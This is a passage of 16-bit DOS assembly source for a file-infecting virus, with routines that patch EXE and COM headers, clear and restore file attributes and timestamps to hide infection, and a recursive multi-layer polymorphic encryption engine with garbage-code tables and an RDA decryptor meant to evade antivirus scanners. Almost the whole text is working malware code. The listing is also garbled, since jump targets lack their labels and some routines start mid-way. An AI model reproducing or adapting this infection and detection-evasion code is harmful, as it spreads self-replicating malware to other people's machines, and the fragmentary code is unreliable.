add es:[bx],ax ; Add size of virus from filesize
adc word ptr es:[bx+02h],00h
pop ax ; Load AX from stack

ret ; Return

lod_file_inf proc near ; Load file information
push dx ; Save DX at stack
mov si,dx ; SI = offset of filename
mov ax,121ah ; Get file's drive
int 2fh

mov dl,al ; DL = drive number
mov ah,36h ; Get free disk space
int 21h

xchg ax,bx ; AX = number of free clusters, BX...
xor dx,dx ; Zero DX
mul bx ; DX:AX = free space on drive in b...
mul cx ; " " " " " " " "

or dx,dx ; Enough free space on drive in b...?
jnz enough_free ; Not zero? Jump to enough_free

cmp ax,2000h ; Enough free space on drive in b...?
pop dx ; Load DX from stack
jae get_file_att ; Above or equal? Jump to get_file_att
stc ; Set carry flag

ret ; Return
mov ax,4300h ; Get file attributes
int 21h
jc lod_fil_exit ; Error? Jump to lod_fil_exit

test cl,00011100b ; System, volume label or directory?
jnz lod_fil_exit ; Not zero? Jump to lod_fil_exit

mov cs:[file_attr],cx ; Store new file attributes

xor cx,cx ; CX = new file attributes
mov ax,4301h ; Set file attributes
int 21h
jc lod_fil_exit ; Error? Jump to lod_fil_exit

mov ax,3d02h ; Open file (read/write)
int 21h
xchg ax,bx ; BX = file handle
jc lod_fil_exit ; Error? Jump to lod_fil_exit

push dx ; Save DX at stack
mov ax,5700h ; Get file's date and time
int 21h
mov cs:[file_date],dx ; Store file's date
mov cs:[file_time],cx ; Store file's time

clc ; Clear carry flag
pop dx ; Load DX from stack

ret ; Return

sto_file_inf proc near ; Store file information
push dx ; Save DX at stack
mov ax,5701h ; Set file's date and time
mov cx,cs:[file_time] ; CX = new time
mov dx,cs:[file_date] ; DX = new date
int 21h

mov ah,3eh ; Close file
int 21h
pop dx ; Load DX from stack

mov ax,4301h ; Set file attributes
mov cx,cs:[file_attr] ; CX = new file attributes
int 21h

ret ; Return

prepare_exe proc near ; Prepare EXE infection
push si ; Save SI at stack
push ax dx ; Save registers at stack
mov cx,200h ; Divide by pages
div cx ; DX:AX = filesize in pages
inc ax ; Increase total number of 512-pag...
cmp ax,word ptr [file_header_+04h]
jne internal_ove ; Internal overlay? Jump to intern...
cmp dx,word ptr [file_header_+02h]
pop dx ax ; Load registers from stack
jne pre_exe_exit ; Internal overlay? Jump to pre_ex...

mov si,word ptr [file_header_+08h]
mov cl,04 ; Multiply by paragraphs
shl si,cl ; SI = header size
sub ax,si ; Subtract header size from filesize
sbb dx,00h ; DX:AX = filesize - header size
mov cx,10h ; Divide by paragraphs
div cx ; DX:AX = initial CS:IP releative ...
mov word ptr [file_header_+14h],dx
mov word ptr [file_header_+16h],ax

mov word ptr [file_header_+0eh],ax
mov word ptr [file_header_+10h],6bb3h
mov ax,dx ; AX = decryptor's offset
pop si ; Load SI from stack

clc ; Clear carry flag

ret ; Return
pop si ; Load SI from stack
stc ; Set carry flag

ret ; Return

prepare_com proc near ; Prepare COM infection
cmp ax,0a831h ; Filesize too large?
ja pre_com_exit ; Above? Jump to pre_com_exit

push ax ; Save AX at stack

mov [file_header_],11101001b
sub ax,03h ; AX = offset of virus within infe...
mov [virus_offset],ax ; Store offset of virus within inf...
pop ax ; Load AX from stack
add ax,100h ; AX = decryptor's offset

clc ; Clear carry flag

ret ; Return

infect_exe proc near ; Infect EXE executable
mov ax,word ptr [filesize]
mov dx,word ptr [filesize+02h]
add ax,[poly_total_lenght]
adc dx,00h ; DX:AX = filesize + length of dec...
mov cx,200h ; Divide by pages
div cx ; DX:AX = filesize in pages
inc ax ; Increase total number of 512-pag...
mov word ptr [file_header_+02h],dx
mov word ptr [file_header_+04h],ax

infect_com proc near ; Infect COM executable
mov ax,4200h ; Set current file position (SOF)
call set_file_pos

mov ah,40h ; Write to file
mov cx,1ah ; Write twenty-six bytes
lea dx,file_header_ ; DX = offset of file_header_
int 21h

clc ; Clear carry flag

ret ; Return

db '"PhantomPolymorphicMultiLayerEngine 1.2"'

; table interpretation
; each entry is composed by an information byte and some data bytes. the
; information bytes contains the number of data bytes the entry has and
; the type of instruction. it is based on the data in the lower nibble
; using this scheme:
; Ú-------Â-------------Â-----------------------------------------------------¿
; | value | data bytes | subroutine called to generate this instruction |
; Ã-------Å-------------Å-----------------------------------------------------´
; | 0 | 1 | routines_various_memoff_or_rr |
; | 1 | 1 | routines_copy_one_plus_imm |
; | 2 | 2 | routines_math_with_immediate |
; | 3 | 2 | routines_manage_math_twobytes |
; | 4 | 1 | routines_one_byte_16reg |
; | 5 | 1 | routines_copy_one_byte |
; | 6 | 2 | routines_copy_one_word |
; | 7 | high nib | routines_copy_many_bytes |
; | 8 | 1 | routines_manage_jumps |
; À-------Á-------------Á-----------------------------------------------------Ù
; if the value of the low nibble is not 7 (in which case the high nibble
; contains the lenght of the data bytes) in the high nibble a comptability
; number is stored. this number is used when the garbage to be generated has
; to be from a certain fixed set and is used by the get_instr_with_compat
; routine. in that case only the table entries that has a high nibble that has
; some specific bits triggered will be considered as possible garbage
; entries candidates. (ie. compat of 0fh mean nothing is changed)

db 40h ;
db 10h ; adc reg,reg or from mem

db 41h ;
db 14h ; adc reg,imm (ax/al only)

db 42h ;
db 80h ; adc reg,imm
db 10h ;

db 60h ;
db 0 ; adc reg,reg or from mem

db 61h ;
db 4 ; add reg,imm (ax/al only)

db 62h ;
db 80h ; add reg,imm
db 0 ;

db 60h ;
db 20h ; and reg,reg or from mem

db 61h ;
db 24h ; and reg,imm (ax/al only)

db 62h ;
db 80h ; and reg,imm
db 20h ;

db 95h ;

db 95h ;

db 95h ;

db 95h ;

db 90h ;
db 38h ; cmp reg,reg or from mem

db 91h ;
db 3Ch ; cmp reg,imm (ax/al only)

db 92h ;
db 80h ; cmp reg,imm
db 38h ;

db 24h ;
db 48h ; dec register 16 bit

db 63h ;
db 0FEh ; dec register
db 8 ; used for reg

db 27h ;
in al,61h

db 44h ;
db 40h ; inc register 16 bit

db 3 ;
db 0FEh ; inc register
db 0 ; used for reg

db 47h
mov ah, 30h

db 47h
mov ah, 2Ah

db 47h
mov ah, 2Ch

db 47h
mov ah, 19h

db 67h
push es
mov ah, 35h
pop es

db 77h
mov ah, 48h
mov bx, 0FFFFh

db 8 ;
db 77h ; ja

db 8 ;
db 73h ; jnb

db 8 ;
db 72h ; jb

db 8 ;
db 76h ; jbe

db 8 ;
db 0E3h ; jcxz

db 8 ;
db 74h ; je

db 8 ;
db 7Fh ; jg

db 8 ;
db 7Dh ; jnl

db 8 ;
db 7Ch ; jl

db 8 ;
db 7Eh ; jle

db 8 ;
db 0EBh ; jmp

db 8 ;
db 75h ; jne

db 8 ;
db 71h ; jno

db 8 ;
db 7Bh ; jnp

db 8 ;
db 79h ; jns

db 8 ;
db 70h ; jo

db 8 ;
db 7Ah ; jp

db 8 ;
db 78h ; js

db 0D7h ;
sub ax, ax
push es
push ax
pop es
les bx, es:[4Ch] ; get int13h vector
mov ax, es
pop es

db 0d7h
push es
xor ax, ax
mov es, ax
les bx, es:[84h] ; get int21h vector
mov dx, es
pop es

db 0a7h
mov cx, 20h
shr ax, 1
rcl ax, 1
dec cx
jnz grb_const_loop_5

db 0b7h
mov cx,10h
mov bx, 0Ah
mul bx
dec cx
jnz grb_const_loop_4

db 0E0h ;
db 88h ; mov reg,reg or from mem

db 0E2h ;
db 0C6h ; mov reg,imm
db 0 ;

db 63h ;
db 0F6h ; neg register
db 18h ; used for register

db 0F5h ;

db 63h ;
db 0F6h ; not register
db 10h ; used for register

db 60h ;
db 8 ; or reg,reg or from mem

db 61h ;
db 0Ch ; or reg,imm (ax/al only)

db 62h ;
db 80h ; or reg,imm
db 8 ;

db 27h ;
push ax
pop dx

db 27h ;
push dx
pop cx

db 27h ;
push bx
pop ax

db 27h ;
rep lodsb

db 27h ;
repnz scasb

db 27h ;
rep scasw

db 17h ;

db 0A7h ;
xor bx,ax
cmp si,1234h
jne grb_const_loop

db 67h ;
add dl,cs:[bx]
dec bx
jne grb_const_loop_2

db 97h ;

xor [bx],cl
xor [bx],cl
jmp grb_const_nijmp
dec cx
jne grb_const_loop_3

db 67h ;
xchg bx,ax
xchg bx,cx
xchg cx,ax
xchg cx,bx

db 47h ;
xchg si,di
xchg di,si

db 27h ;
push si
pop di

db 47h ;
call grb_const_nicall
pop si

db 3 ;
db 0D0h ; rcl register
db 10h ; used for register

db 3 ;
db 0D0h ; rcr register
db 18h ; used for register

db 63h ;
db 0D0h ; rol register
db 0 ; used for register

db 63h ;
db 0D0h ; ror register
db 8 ; used for register

db 63h ;
db 0D0h ; shl register
db 20h ; used for register

db 3 ;
db 0D0h ; sar register
db 38h ; used for register

db 63h ;
db 0D0h ; shr register
db 28h ; used for register

db 95h ;

db 17h ;

db 15h ;

db 0F6h
xchg bx,bx

db 0F6h ;
xchg cx,cx

db 0F6h ;
xchg dx,dx

db 0F6h ;
xchg di,di

db 0F6h ;
xchg si,si

db 60h ;
db 28h ; sub reg,reg or from mem

db 61h ;
db 2Ch ; sub reg,imm (ax/al only)

db 62h ;
db 80h ; sub reg,imm
db 28h ;

db 1 ;
db 0A8h ; test reg,imm (ax/al only)

db 2 ;
db 0F6h ; test reg,imm
db 0 ;

db 60h ;
db 30h ; xor reg,reg or from mem

db 61h ;
db 34h ; xor reg,imm (ax/al only)

db 32h ;
db 80h ; xor reg,imm
db 30h ;

db 0FFh ; marker for end of table
push si
xor si,si
call rda_get_datetime
pop si

push si
xor si,si
call random_value_with_modulus
pop si

mov ax, 1
call get_random_limit

; PPMLE entry point
; calling registers:
; CX = lenght to encrypt
; SI = running offset
; DI = where to put generated code
; BX =

mov ax, 8 ; how many encryption layers
call get_random_limit ; (RDA layer not included)
mov ds:[poly_layer_nr], al
mov ds:[poly_actual_layer], 0
mov ds:[poly_reg_cx], cx ; store some regs and then
mov ds:[poly_reg_si], si ; call the poly routine
mov ds:[poly_reg_bx], bx
mov ds:[poly_reg_di], di
call generate_poly
mov dx, ds:[poly_reg_di]
mov ax, ds:[poly_total_lenght]
mov cx, ax
ret ; back from poly

; return registers:
; CX = lenght of generated code
; DX = pointer on generated code

mov ax, ds:[poly_actual_layer]
cmp al, ds:[poly_layer_nr]
jb poly_generate_layer

mov ds:[end_most_internal_layer], di
call rda_and_body_encrypt
ret ; back to lower layer activation

sub sp, 40h ; stack space needed
; as temp storage
mov ds:[layer_sp_pointer], sp
mov ds:[layer_di_pointer], di

call poly_init_stage1 ; init all regs to some
; value and put quite
; some garbage
mov ax, 0Fh
call get_random_limit ; how many math ops
inc ax ; on memory will be
mov ds:[howmany_from_used_table], ax ; created

mov ax, 7 ; get initialization
call get_random_limit ; type
mov ds:[tipo_register], ax
mov word ptr ds:[counter_direction], 0
cmp ax, 4 ; 1/2 prob
jl dontmodifydirection
mov word ptr ds:[counter_direction], 1

call get_random_0_or_1
mov ds:[pointer_direction], al

mov ax, 3
call get_random_limit
mov bx, ax
mov al, [bx + offset possible_pointers]
cmp byte ptr ds:[pointer_direction], 0
jnz ok_pointer_sel_d
cmp al, 5 ; bp
jz select_the_pointer_reg

mov ds:[pointer_register], al

mov ax, 7
call get_random_limit
cmp al, ds:[pointer_register]
jz resel_cnt_regg
cmp al, 4 ; no stack pointer
jz resel_cnt_regg
mov ds:[counter_register], al
cmp al, 0 ; using ax
jnz grb_rest_notneeded
mov byte ptr ds:[restrict_grb_ax_is_used], 1

call register_assign_init
mov cx, ds:[howmany_from_used_table]
xor si, si

mov ax, 0Ah
call get_random_limit ; fill on the stack
mov bp, ds:[layer_sp_pointer] ; with random vals
mov [bp+si], al ; for next subrout
inc si ; use
loop fill_stack_for_genmath

mov byte ptr ds:[create_or_just_read], 0
mov word ptr ds:[pointer_to_used_table], offset mom_table
call generate_math_on_mem_ops

mov byte ptr ds:[register_compat + 1], 0EFh
mov cl, ds:[pointer_register]
mov al, 1
shl al, cl
not al
and ds:[register_compat + 1], al ; can do everything
; xcept pointer reg

cmp byte ptr ds:[pointer_register], 3 ; bx?
jnz lower_can_use_also_bx
mov al, 77h ; can use all lower
and ds:[register_compat], al ; xcept bh/bl

mov ax, 0Fh
call get_random_limit
inc ax
mov cx, ax

mov ax, 7
call get_random_limit ; select a register
mov ds:[garbage_register], al
cmp word ptr ds:[garbage_word_byte], 1
jnz check_regz_when_by

cmp al, 4 ; no sp
jz dec_loop_internal_garbage

cmp al, ds:[pointer_register] ; no pointer
jz dec_loop_internal_garbage

cmp al, ds:[counter_register] ; no counter
jz dec_loop_internal_garbage
jmp short dec_loop_int_grb_ok

and al, 3 ; is byte size
cmp al, ds:[counter_register] ; no counter
jz dec_loop_internal_garbage
cmp byte ptr ds:[pointer_register], 3 ; if not bx then ok
jnz dec_loop_int_grb_ok ; anyway other just
; 16bit access
cmp al, ds:[pointer_register] ; no pointer
jz dec_loop_internal_garbage

push cx
mov ax, 6
call get_instr_with_compat
call call_generator
pop cx
loop dec_loop_internal_garbage

call exitloop_condition_gen ; put the check for
; decryptor end and
; jump back
mov di, ds:[dec_loop_end_pos] ; put a ret opcode
mov al, 0C3h ; just at the decryptor
stosb ; ends

mov ds:[decryptor_ended_inmem_pnt], di
push word ptr ds:[layer_sp_pointer]
push word ptr ds:[decryptor_ended_inmem_pnt]
push word ptr ds:[layer_di_pointer]
push word ptr ds:[howmany_from_used_table]
push word ptr ds:[tipo_register]
push word ptr ds:[counter_direction]
push word ptr ds:[pointer_assign_pos]
push word ptr ds:[counter_assign_pos]
push word ptr ds:[counter_check_pos]
push word ptr ds:[dec_loop_begin_pos]
push word ptr ds:[dec_loop_end_pos]
mov al, ds:[pointer_register]
push ax
mov al, ds:[pointer_direction]
push ax

inc word ptr ds:[poly_actual_layer]
call generate_poly ; recursive layer gen

pop ax
mov ds:[pointer_direction], al
pop ax
mov ds:[pointer_register], al
pop word ptr ds:[dec_loop_end_pos]
pop word ptr ds:[dec_loop_begin_pos]
pop word ptr ds:[counter_check_pos]
pop word ptr ds:[counter_assign_pos]
pop word ptr ds:[pointer_assign_pos]
pop word ptr ds:[counter_direction]
pop word ptr ds:[tipo_register]
pop word ptr ds:[howmany_from_used_table]
pop word ptr ds:[layer_di_pointer]
pop word ptr ds:[decryptor_ended_inmem_pnt]
pop word ptr ds:[layer_sp_pointer]
mov ax, ds:[pnt_to_end_after_rda]
mov ds:[pointer_to_end_after_rda_2], ax

call correct_pnt_addr_vals
call word ptr ds:[layer_di_pointer] ; execute layer

mov si, ds:[decryptor_ended_inmem_pnt]
mov di, si
dec di ; copy everything one
mov cx, ds:[poly_total_lenght] ; byte lower so we
cld ; delete the ret
repe movsb

dec word ptr ds:[pnt_to_end_after_rda]
mov di, ds:[howmany_from_used_table]
mov si, 0
dec di

mov bp, ds:[layer_sp_pointer] ; copy all the math
mov al, [bp+di] ; ops from stack zone
mov [si+offset mops_tmptable], al ; to mem storage
dec di
inc si
cmp si, ds:[howmany_from_used_table]
jnz mom_copy_from_stack_tm

mov si, offset mops_tmptable ; from
lea di, [bp+0] ; to stack zone
mov cx, ds:[howmany_from_used_table]
mov ss:[di], al ; so copy the math ops
inc di ; on mem in reverse
loop reverse_mom_copy ; order on stack

mov di, ds:[howmany_from_used_table]
mov si, 0
dec di
mov al, [bp+di+30h] ; and now copy

mov [si+offset mops_tmptable], al ; registers pairs from
dec di ; stack to temp mem
inc si
cmp si, ds:[howmany_from_used_table]
jnz mom_copy_from_stack_tm_2

mov si, offset mops_tmptable
lea di, [bp+30h]
mov cx, ds:[howmany_from_used_table]
lodsb ; and now just put them
mov ss:[di], al ; in rev order again
inc di ; on the stack
loop reverse_mom_copy_2

mov byte ptr ds:[create_or_just_read], 1
mov ds:[pointer_to_used_table], offset mom_table_inv
mov di, ds:[dec_loop_begin_pos]
call generate_math_on_mem_ops ; everything ready on
; stack, so just create
; the dec instructions
mov ax, ds:[poly_actual_layer]
sub ax, ds:[poly_reg_bx]
add ax, ds:[poly_reg_di]
sub ds:[decryptor_ended_inmem_pnt], ax
mov ax, ds:[decryptor_ended_inmem_pnt]
add ax, ds:[poly_total_lenght]
dec ax
mov ds:[pointer_to_end_after_rda_2], ax
call correct_pnt_addr_vals ; now correct inits
; for "normal" exec
mov ax, ds:[dec_loop_end_pos] ; last calculations
sub ax, ds:[layer_di_pointer] ; on lenght
add ds:[poly_total_lenght], ax
dec word ptr ds:[poly_actual_layer]
add sp, 40h ; correct stack
ret ; layer finished


; this is the rda engine
mov di, ds:[end_most_internal_layer]
push di
mov cx, 4 ; how many entries from table
mov si, 0

; gets 4 random entries from the first table. each entry is 4 bytes long
; and will be used as a base for the RDA generation later.
mov ax, 7
call get_random_limit
shl ax, 1 ; each entry in table is 4 bytes
shl ax, 1
mov bx, ax
mov ax, [bx+offset rda_from_table_part_1]
mov [si+offset rda_to_part_1], ax
mov ax, [bx+offset rda_from_table_part_1 + 2]
mov [si+offset rda_to_part_1 + 2], ax
add si, 4 ; next destination
loop fill_first_part_rda

; gets 16 random entries from the second table. each entry is 2 bytes long.
; aswell as the entry the loop stores also, on the opposite side of the
; table, the coordinated second entry (other 2 bytes) that actually does
; the exact inverse operation.
mov cx, 10h ; how many entries from table
mov si, 0

mov ax, 0Ah ; 10 possible
call get_random_limit
shl ax, 1
mov bx, ax
mov ax, [bx+offset rda_from_table_part_2] ; 2nd tbl
mov [si+offset rda_to_part_2], ax
neg bx ; get the contra

tbl2_len equ (offset rda_from_table_part_2_end - offset rda_from_table_part_2)

add bx,((tbl2_len-04h)/02h)
mov ax, [bx+(offset rda_from_table_part_2 + tbl2_len/2)]
push si
neg si
add si, (40h/2 - 2) ; from end
mov [si+offset rda_to_part_2 + 20h], ax ; half table
pop si
add si, 2
loop fill_second_part_rda

; now the basic rda code will be copied in place with some garbage inserted.
; please check the comments at the rda_steps_table and the loop below for some
; hints on how it works.
mov si, offset rda_basic_body ; to basic rda body
lea bx, rda_steps_table ; to steps
mov cx, 0C4h ; nr of steps

rda_add equ (offset rda_address_buffer - offset rda_basic_body)
; must equ 1df3h

; rda_add will be used to point with si to the memory buffer where the
; address of each generated step (from the steps table) will be stored
; (so later offset correction, ie. for jumps, can be calculated with this
; informations). the way of addressing this memory zone is structured in
; a way so that the address of a given instruction pointed by si is stored
; in si + rda_add. of course for the thing to work we can address just each
; 2 bytes, so you'll see in the steps table that there isn't any 1 byte only
; step (so the rets, that should be 1 byte only, are padded with one more byte)

push cx
mov [si+rda_add], di
mov byte ptr ds:[rda_garbage_limits], 0 ; reset limit
mov dl, [bx] ; get step type

test dl, 10h
jz just_copy_whatever
test dl, 2
jz garbage_in_rda_skip_typelim1
or byte ptr ds:[rda_garbage_limits], 1

test dl, 4
jz just_copy_whatever_new_regcompat
or byte ptr ds:[rda_garbage_limits], 2

inc bx
mov dl, [bx] ; hold register compatibility
; info, that is which can be
; used as garbage
mov cl, [bx+1] ; hold nr of bytes to copy
repe movsb ; copy needed stuff
cmp dl, 0
jnz some_reg_is_usable_for_grb
jmp short move_for_next_loop

mov byte ptr ds:[register_compat], 0FFh ; all regs
mov byte ptr ds:[register_compat + 1], 0FFh ; usable
xor ds:[register_compat + 1], dl
mov al, dl
and al, 0Fh
xor ds:[register_compat], al ; set to the mask
mov cl, 4 ; given by the table
shl al, cl
xor ds:[register_compat], al

mov ax, 5 ; how many garbage instrs
call get_random_limit
or ax, ax
jz move_for_next_loop

mov cx, ax
push cx
test byte ptr ds:[rda_garbage_limits], 2
jnz some_type_limit_set

mov ax, 7
call get_random_limit ; select garbage reg
mov cx, ax
mov ax, 1
shl ax, cl
test [bx], al ; is still compatible?
jz select_a_reg_rdag
mov ds:[garbage_register], cl
mov word ptr ds:[garbage_word_byte], 1
push si
push bx

test byte ptr ds:[rda_garbage_limits], 1
jz np_nolimits_rgrb

mov ax, 0Eh
call get_instr_with_compat
jmp short generate_rda_ginst

push si
push bx
mov ax, 9
call get_instr_with_compat
jmp short generate_rda_ginst

call get_instr_from_table ; set si to an entry in the
; table

call call_generator ; call appropriate handler
; for the entry pointed by si
pop bx
pop si
pop cx
loop rda_garbage_loop_1

add bx, 2 ; to next entry
pop cx
dec cx ; loop counter
jcxz end_rda_basic_body_gen
jmp main_rda_loop_body

; now the entire rda routine has been placed and now the modifications and
; assignations are needed (ie. correct all the jump offsets, since garbage
; was inserted and so on)

sub di, 2
call rda_corr_mem_offsets ; correct any memory reference

mov ax, 10h
call get_random_limit
mov ds:[rda_add_to_lenght_rnd], ax

mov si, word ptr [rda_add + offset rda_add_di_instr]
add [si+2], ax ; the correction of di before
; the cmp cs:[di],dx in the
; rda code depending on how
; many nops we stored
xchg ax, cx
mov al, 90h
repe stosb

mov cx, ds:[poly_reg_cx]
mov si, ds:[poly_reg_si]
repe movsb ; copy the virus to encrypt
pop ax
mov ds:[poly_total_lenght], di
sub ds:[poly_total_lenght], ax

dec di
mov ds:[pnt_to_end_after_rda], di

push di
mov si, word ptr [rda_add + offset rda_second_dw_0]
; pointer to second 00 dw in rda
mov ax, ds:[rda_add_to_lenght_rnd]
mov word ptr [si],(code_end-virus_begin) ; virus lenght
add [si], ax ; + 0-10h random

mov ax, word ptr [rda_add + offset rda_end_basic_bodycode]
; pointer to end (to the nops)
sub ax, word ptr [rda_add + offset rtc_comm_routine]
add ax, 0AFh
add ax, ds:[rda_add_to_lenght_rnd]
mov si, word ptr [rda_add + offset rda_fourth_dw_0]
; pointer to fourth 00 dw
mov [si], ax

mov ax, 0FFFFh
call get_random_limit
mov si, word ptr [rda_add + offset rda_third_dw_0]
; pointer to third 00 dw
mov [si], ax

mov si, word ptr [rda_add + offset rda_first_db_0]
mov byte ptr [si], 0FFh

mov ax, ds:[rda_modulusv]
call get_random_limit
mov si, word ptr [rda_add + offset rda_first_dw_0]
; pointer to first 00 dw
mov [si], ax

mov ax, 3
call get_random_limit
xchg ax, bx
shl bx, 1
shl bx, 1
mov ax, [bx+offset rda_to_part_1] ; one of the inits
mov si, word ptr [rda_add + offset rda_init_storage_1]
mov [si], ax ; place it in the loop

mov ax, [bx+offset rda_to_part_1 + 2] ; the second
mov si, word ptr [rda_add + offset rda_init_storage_2]
mov [si], ax ; place in the loop

mov ax, word ptr [rda_add + offset rda_calculate_value_in_dx]
mov si, ds:[end_most_internal_layer]
sub si, offset rda_basic_body
call ax ; calculated value on undec body

mov si, word ptr [rda_add + offset rda_end_basic_bodycode]
add si, offset rda_checkvalue-100h
add si, ds:[rda_add_to_lenght_rnd]
mov [si], dx ; store the calculated value

mov si, word ptr [rda_add + offset enc_dec_byte]
mov byte ptr [si], 1 ; next time will have to decr

mov ax, word ptr [rda_add + offset rda_encdec_routine]
mov si, ds:[end_most_internal_layer]
sub si, offset rda_basic_body
call ax ; execute encryptor

mov si, word ptr [rda_add + offset rnd_seed_1]
mov [si], ds ; now just delete the enc data
mov si, word ptr [rda_add + offset rnd_seed_2]
mov [si], ds
mov si, word ptr [rda_add + offset rda_first_dw_0]
mov [si], ds
pop di
ret ; rda finished

push di
mov si, offset rda_basic_body
lea bx, rda_steps_table
mov cx, 0C4h ; number of steps

push cx
mov dl, [bx] ; get the info byte to check
test dl, 10h
jnz rda_corr_do_smthing
jmp short rda_corr_skip_to_next

test dl, 8
jnz rda_corr_somejump
test dl, 1
jnz rda_corr_mem_references
jmp short rda_corr_getback_2

; correct the displacement of a memory reference (ie. [si+666h]) to include
; the generated garbage
push bx
mov al, [si] ; check for a segment override to skip
cmp al, 2Eh ; CS:
jz rda_corr_skip_seg_ov
cmp al, 3Eh ; DS:
jz rda_corr_skip_seg_ov
cmp al, 26h ; ES:
jz rda_corr_skip_seg_ov
cmp al, 36h ; SS:
jnz rda_corr_mem_ref

inc si ; skip the segment override

mov bx, [si+2] ; normal displacement
mov dx, [bx+rda_add] ; in mem position
mov di, [si+rda_add] ; where to place
sub dx, ds:[end_most_internal_layer] ; real displacment
add dx, offset rda_basic_body ;
mov [di+2], dx ; put new displacment
pop bx
jmp short rda_corr_getback_2

; correct some jump type
push bx
mov al, [si] ; get type of jump

cmp al, 0E9h ; jmp far opcode

jz rda_corr_call_jmpfar

cmp al, 0E8h ; call opcode
jz rda_corr_call_jmpfar

mov al, [si+1] ; then we have a short jump to correct
cbw ; the offset
xchg ax, bx
mov dx, [bx+si+rda_add+2] ; where to jump
sub dx, [si+rda_add] ; from where
mov di, [si+rda_add] ; where to place
sub dx, 2 ; opcode lenght
mov [di+1], dl ; store
jmp short rda_corr_retback_wbx

; corrects the offset for a call or jmp far opcode, so the new offset will
; include all the generated garbage to skip.
mov bx, [si+1] ; get where to jump (if there
; wasn't any garbage)
mov dx, [bx+si+rda_add+3]
; where actually to jump (with
; the garbage included and the
; call opcode lenght)
sub dx, [si+rda_add] ; - where is this instruction
; in mem
mov di, [si+rda_add] ; where is this instruction in
; memory
sub dx, 3 ; - lenght of opcode
mov [di+1], dx ; store the new offset in place

pop bx

inc bx

mov al, [bx+1] ; lenght of instruction

add si, ax ; to next in plain rda alg
add bx, 2 ; to next step in step table
pop cx
dec cx ; last step?
jz rda_corr_exit_routine
jmp rda_corr_loop_begin

pop di


; will correct the pointer and counter initialization instructions generated
; before depending on the initialization type used. just a couple of checks
; and lenght/pointer corrections.
mov bx, ds:[tipo_register] ; init type used
and bx, 3

cmp bx, 2 ; initialized just pointer?
jz was_init_just_point

cmp bx, 1 ; = 1 counter with imm and pnt
jnz was_init_cnt0_pnt

mov di, ds:[counter_assign_pos]
mov ax, ds:[poly_total_lenght]
stosw ; so set the immediate for the cnt

cmp byte ptr ds:[pointer_direction], 0
jnz was_init_pnt_frstart
mov di, ds:[pointer_assign_pos]
mov ax, ds:[pointer_to_end_after_rda_2]
cmp word ptr ds:[counter_direction], 0
jnz was_init_cnt_frstart
mov ax, ds:[decryptor_ended_inmem_pnt]

mov di, ds:[counter_check_pos]
mov ax, ds:[poly_total_lenght]
jmp short correct_pnt_add_exit

cmp byte ptr ds:[pointer_direction], 0
jnz was_init_pnt_frstart_2
mov di, ds:[pointer_assign_pos]
mov ax, ds:[decryptor_ended_inmem_pnt]
cmp word ptr ds:[counter_direction], 0
jz was_init_cnt_frstart_2

mov ax, ds:[pointer_to_end_after_rda_2]

mov di, ds:[counter_check_pos]
cmp word ptr ds:[counter_direction], 1
jz was_init_cnt_frend_2
add ax, ds:[poly_total_lenght]
jmp short was_init_store_cnt

sub ax, ds:[poly_total_lenght]

jmp short correct_pnt_add_exit

cmp word ptr ds:[counter_direction], 1
jz no_countercheck_anyway

mov di, ds:[counter_check_pos]
mov ax, ds:[poly_total_lenght]

mov di, ds:[pointer_assign_pos]
mov ax, ds:[poly_total_lenght]
cmp word ptr ds:[counter_direction], 1
jz from_endtobegin
xor ax, ax
mov cx, ds:[howmany_from_used_table]
mov bp, ds:[layer_sp_pointer]
mov ax, ds:[decryptor_ended_inmem_pnt]
cmp word ptr ds:[counter_direction], 0
jz fin_clearloop
dec ax
mov di, [bp+10h]
inc bp
inc bp
loop fin_clearloop


mov bx, ds:[tipo_register] ; type of init
shl bx, 1
jmp [offset table_init_type + bx] ; select from table one
; of the three below


; this sets the counter to zero using one of the three different types
; available (xor reg,reg ; sub reg,reg ; and reg,0) and sets the pointer
; with a normal mov. saves the pointer assignation position.
mov word ptr ds:[garbage_word_byte], 1
mov al, ds:[counter_register]
mov ds:[garbage_register], al
mov ax, 2 ; first three service routines
call get_random_limit ; will zero the requested
mov bx, ax ; register in different ways
shl bx, 1
call [offset service_routines_table + bx]

mov al, 0B8h ; mov reg16,imm
or al, ds:[pointer_register]
mov ds:[pointer_assign_pos], di
jmp short set_the_last_off_i

; this initializes the pointer and counter with normal mov instructions and
; saves both pointer and counter initialization position if it could be filled
; later
mov al, 0B8h ; mov reg16,imm
or al, ds:[counter_register]
mov ds:[counter_assign_pos], di
mov ax, ds:[poly_total_lenght]

mov al, 0B8h ; mov reg16,imm
or al, ds:[pointer_register]
mov ds:[pointer_assign_pos], di
jmp short set_the_last_off_i

; this initializes just the pointer register, so special care will be taken
; in a later stage for the counter conditions. pointer init position is saved
mov al, 0B8h ; mov reg16,imm
or al, ds:[pointer_register]
mov ds:[pointer_assign_pos], di

xor ax, ax
mov ds:[dec_loop_begin_pos], di


mov word ptr ds:[counter_check_pos], offset dumb_cntr_ass
mov al, 40h ; inc opcode
cmp word ptr ds:[counter_direction], 0
jz clear_prefetch_if_dn
mov ax, 0EBh
stosw ; jmp to next instruction
mov al, 48h ; dec opcode

or al, ds:[pointer_register]
mov bx, ds:[tipo_register] ; how did we initialize?
shl bx, 1 ; do the check to match init
jmp word ptr [table_end_loop_check + bx]

; the code for the three routines from the table_end_loop_check table

mov al, 40h ; inc opcode
or al, ds:[counter_register]

mov al, 81h ; generate check for end of loop
stosb ;
mov al, 0F8h ; cmp counter,imm
or al, ds:[counter_register]
stosb ;
jmp short cmp_wzero ; with imm = 00

cmp byte ptr ds:[counter_register], 1 ; is cx?
jz is_cx_so_can_loop

mov al, 48h ; dec counter
or al, ds:[counter_register]
jmp short put_thefin_jne

mov al, 0E2h ; loop opcode
jmp short add_loop_offset

mov al, 81h ; cmp pointer,imm
mov al, 0F8h
or al, ds:[pointer_register]
mov ds:[counter_check_pos], di ; save if has to be
xor ax, ax ; changed later

mov al, 75h ; jne opcode

mov ax, di ; calculate the jump offset
inc ax
sub ax, ds:[dec_loop_begin_pos]
neg ax
mov ds:[dec_loop_end_pos], di

cmp [need_segovv], 1 ; need to force CS: ?
jz no_segovv_ndd
mov al, 2Eh ; CS: segment override

mov word ptr ds:[math_seq_stack_off], 0
mov cx, ds:[howmany_from_used_table]
sub si, si
sub bx, bx
mov bp, ds:[layer_sp_pointer] ; to our current stack
; reserved space
push si
push bx
push cx
call check_for_segovv
mov bl, [bp+si] ; get the value from
shl bx, 1 ; stack and create
push si ; offset
add bx, ds:[pointer_to_used_table]
call word ptr [bx] ; call table entry
pop si
shl si, 1

